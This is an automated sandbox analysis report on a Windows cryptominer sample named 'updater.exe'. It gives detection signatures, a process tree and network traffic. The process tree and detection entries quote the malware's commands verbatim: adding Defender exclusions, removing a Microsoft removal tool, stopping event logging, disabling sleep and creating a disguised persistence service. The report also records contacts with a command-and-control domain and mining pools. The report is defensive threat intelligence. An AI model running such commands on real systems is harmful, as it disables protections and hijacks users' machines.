Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
updater.exe

Overview

General Information

Sample name:updater.exe
Analysis ID:1478400
MD5:d82677ac9971e38439a6f8069e8ba5bf
SHA1:534b60e16989751c4e2252bbbcc38d97b979f2d0
SHA256:f981ff1ec7014262015fa7ff9cc01097e98ecec7385e0828b7d91dde5b38ce03
Tags:exeSilentCryptoMinerUnamSanctam
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • updater.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\updater.exe" MD5: D82677AC9971E38439A6F8069E8BA5BF)
    • powershell.exe (PID: 3376 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5568 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5596 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3872 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5760 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5040 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6176 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6364 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 892 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5272 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5348 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 1896 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: D82677AC9971E38439A6F8069E8BA5BF)
    • powershell.exe (PID: 3304 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5600 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1096 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3688 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4148 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4292 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1632 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 2568 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 5596 cmdline: conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4436 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000027.00000002.3249654814.000002862EC04000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000027.00000002.3249654814.000002862EC16000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000027.00000003.2729862472.000002862EC1F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
              • 0x37eb98:$a1: mining.set_target
              • 0x370e20:$a2: XMRIG_HOSTNAME
              • 0x373748:$a3: Usage: xmrig [OPTIONS]
              • 0x370df8:$a4: XMRIG_VERSION
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              39.2.conhost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                39.2.conhost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x37ef98:$a1: mining.set_target
                • 0x371220:$a2: XMRIG_HOSTNAME
                • 0x373b48:$a3: Usage: xmrig [OPTIONS]
                • 0x3711f8:$a4: XMRIG_VERSION
                39.2.conhost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                39.2.conhost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
                • 0x3cd180:$s3: \\.\WinRing0_
                • 0x376148:$s4: pool_wallet
                • 0x3705f0:$s5: cryptonight
                • 0x370600:$s5: cryptonight
                • 0x370610:$s5: cryptonight
                • 0x370620:$s5: cryptonight
                • 0x370638:$s5: cryptonight
                • 0x370648:$s5: cryptonight
                • 0x370658:$s5: cryptonight
                • 0x370670:$s5: cryptonight
                • 0x370680:$s5: cryptonight
                • 0x370698:$s5: cryptonight
                • 0x3706b0:$s5: cryptonight
                • 0x3706c0:$s5: cryptonight
                • 0x3706d0:$s5: cryptonight
                • 0x3706e0:$s5: cryptonight
                • 0x3706f8:$s5: cryptonight
                • 0x370710:$s5: cryptonight
                • 0x370720:$s5: cryptonight
                • 0x370730:$s5: cryptonight

                Sigma Signatures

                Change of critical system settings

                barindex
                Sigma detected: Disable power options
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3872, ProcessName: powercfg.exe

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3376, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3376, ProcessName: powershell.exe
                Sigma detected: New Service Creation Using Sc.EXE
                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 892, ProcessName: sc.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3376, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 4436, ProcessName: svchost.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Stop EventLog
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 6300, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5272, ProcessName: sc.exe

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-22T15:45:08.333951+0200
                SID:2826930
                Source Port:49724
                Destination Port:443
                Protocol:TCP
                Classtype:Crypto Currency Mining Activity Detected
                Timestamp:2024-07-22T15:46:06.697997+0200
                SID:2047928
                Source Port:60971
                Destination Port:53
                Protocol:UDP
                Classtype:Crypto Currency Mining Activity Detected
                Timestamp:2024-07-22T15:46:06.696381+0200
                SID:2054247
                Source Port:80
                Destination Port:49723
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-22T15:45:05.821446+0200
                SID:2040353
                Source Port:52943
                Destination Port:53
                Protocol:UDP
                Classtype:Crypto Currency Mining Activity Detected
                Timestamp:2024-07-22T15:45:11.088905+0200
                SID:2044697
                Source Port:49708
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-22T15:46:06.695665+0200
                SID:2044697
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://koldiv.ruAvira URL Cloud: Label: malware
                Source: http://koldiv.ru/api/endpoint.phpAvira URL Cloud: Label: malware
                Source: http://koldiv.ru/http://koldiv.ruAvira URL Cloud: Label: malware
                Multi AV Scanner detection for dropped file
                Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 65%
                Multi AV Scanner detection for submitted file
                Source: updater.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                Bitcoin Miner

                barindex
                Yara detected Xmrig cryptocurrency miner
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 39.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000027.00000002.3249654814.000002862EC04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.3249654814.000002862EC16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000003.2729862472.000002862EC1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 5596, type: MEMORYSTR
                Found strings related to Crypto-Mining
                Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: conhost.exeString found in binary or memory: cryptonight-monerov7
                Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                Source: updater.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp

                Networking

                barindex
                Connects to a pastebin service (likely for C&C)
                Source: unknownDNS query: name: pastebin.com
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 162.19.139.184:12222
                Source: Joe Sandbox ViewIP Address: 141.94.96.195 141.94.96.195
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox ViewIP Address: 162.19.139.184 162.19.139.184
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raw/HpN5DV4T HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
                Source: global trafficHTTP traffic detected: GET /raw/xhASwz5f HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
                Source: global trafficHTTP traffic detected: GET /http://koldiv.ru HTTP/1.1Accept: */*Connection: closeHost: koldiv.ruUser-Agent: cpp-httplib/0.12.6
                Source: global trafficDNS traffic detected: DNS query: xmr.2miners.com
                Source: global trafficDNS traffic detected: DNS query: koldiv.ru
                Source: global trafficDNS traffic detected: DNS query: pastebin.com
                Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
                Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 366Content-Type: application/jsonHost: koldiv.ruUser-Agent: cpp-httplib/0.12.6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.25.4Date: Mon, 22 Jul 2024 13:45:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: accept-language,accept-charsetAccept-Ranges: bytesContent-Language: enData Raw: 34 30 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 6b 6f 6c 64 69 76 2e 72 75 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 77 65 62 6d 61 73 74 65 72 40 6b 6f 6c 64 69 76 2e 72 75 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 2
                Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                Source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                Source: conhost.exe, 00000027.00000003.2414280384.000002862EC60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://koldiv.ru
                Source: conhost.exe, 00000027.00000002.3249654814.000002862EBE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://koldiv.ru/api/endpoint.php
                Source: conhost.exe, 00000027.00000003.2414325891.000002862EC26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://koldiv.ruCESSOR_REVI
                Source: conhost.exe, 00000027.00000002.3248257230.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
